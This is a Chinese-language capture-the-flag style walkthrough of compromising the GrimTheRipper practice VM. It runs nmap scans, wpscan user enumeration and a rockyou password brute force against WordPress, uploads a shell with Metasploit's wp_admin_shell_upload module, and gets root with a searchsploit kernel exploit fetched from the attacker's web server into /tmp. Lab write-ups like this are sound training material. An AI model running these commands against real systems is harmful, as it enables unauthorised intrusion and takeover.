下载地址
配置的环境:
kali:192.168.25.131 GrimTheRipper 靶机 和 kali 在同一C段
开搞
nmap扫描网段,发现存活主机
nmap -sP 192.168.25.0/24
发现主机 192.168.25.135,判定为 GrimTheRipper 靶机 ,继续使用nmap获取详细信息
nmap -A -p 1-65535 192.168.25.135
很常规,开了个ssh和http,访问站点 http://192.168.25.135 看看,这制作镜像的是个逗比,放了个图,看看源代码
啥也没有
扫目录就完事了,启动俺的御剑,得到反爬虫 robots.txt,页面出现 /index2.html
访问/index2.html
本来我的思路的post提交 shit,想了想太变态了,查看源代码发现字符
<!--THpFd01UQXhNREU9IHRyeSBoYXJk-->
base64解密得到又一串,继续base64解密,得到路径 /1010101
访问/1010101,看到了熟悉的CMS,wordpress
访问页面随便点了点,我测试了下,看看有没有注入点,SQLMAP启动无果
查看源代码发现是3.5版本,随便找了个对应的有个插件RCE漏洞,测试发现没有安装该插件,
直接启动 wpsan,收集站点用户名,准备爆破,得到admin用户(也可以把能rce对应的漏洞都试试)
扫描wordpress用户
wpscan --url http://192.168.25.135/1010101/wordpress/ --enumerate u
加载字典,爆破得到密码 Password@123
暴力破解密码
wpscan --url http://192.168.25.135/1010101/wordpress/ --usernames admin -P /root/rockyou.txt
访问/wp-admin 跳转到后台登录界面,这边作者搞的有点问题,跳转的全都是是本地127.0.0.1 URL,需要自己改一下,然后登录
登录跳转也是跳本地,佛了,要不你改一下表单跳转进入对应ip的后台,或者直接启动msf直接上传shell
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.25.135
set username admin
set password Password@123
set targeturi /1010101/wordpress/
exploit 攻击
show options检查一下
ok,返回了 meterpreter ,攻击成功,sysinfo查看信息,应该可以直接内核exp提权
返回一个shell
python -c "import pty;pty.spawn('/bin/bash')"
提权
ok,目前信息如下
直接用kali的搜索功能搜exp
searchsploit 12.04 | grep 3.13.0
下载编译运行
我们这边需要搭一个简单的http服务,让靶机可以访问下载这个exp,直接kali起一个apache服务
浏览器访问 kali,得到如下页面就成功啦
我们把对应的exp放到 web路径下默认为(/var/www/html)
然后在靶机上下载就可以啦,默认路径没有权限,我们放到 tmp临时路径下(权限大)
编译运行exp,成功拿下!
总结: 这靶机没什么技术含量,就是熟悉熟悉流程,不过作者应该是个逗比 :)